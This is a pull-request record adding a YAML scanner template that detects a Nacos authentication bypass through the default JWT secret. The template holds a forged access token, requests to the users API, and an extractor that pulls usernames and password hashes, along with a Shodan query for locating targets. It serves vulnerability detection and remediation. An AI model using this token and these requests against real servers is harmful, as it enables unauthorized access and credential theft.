Merge pull request #6912 from Esonhugh/template_branch_nacos_bypass_authentication

Add nacos default jwt secret bypass auth Template

misconfiguration/nacos-authentication-bypass.yaml

@@ -0,0 +1,50 @@
+id: nacos-authentication-bypass
+
+info:
+  name: Nacos < 2.2.0 - Authentication Bypass
+  author: Esonhugh
+  severity: critical
+  description: |
+    The authentication function of Nacos is can be bypass through default JWT secret.
+  reference:
+    - https://github.com/alibaba/nacos/issues/10060
+    - https://avd.aliyun.com/detail?id=AVD-2023-1655789
+    - https://nacos.io/zh-cn/docs/auth.html
+  remediation: Change value of jwt secret in the configurations
+  metadata:
+    verified: "true"
+    shodan-query: title:"Nacos"
+  tags: auth-bypass,nacos,misconfig,jwt
+
+variables:
+  token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
+      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"username":'
+          - '"password":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        name: extracted-credentials
+        json:
+          - ".pageItems[]"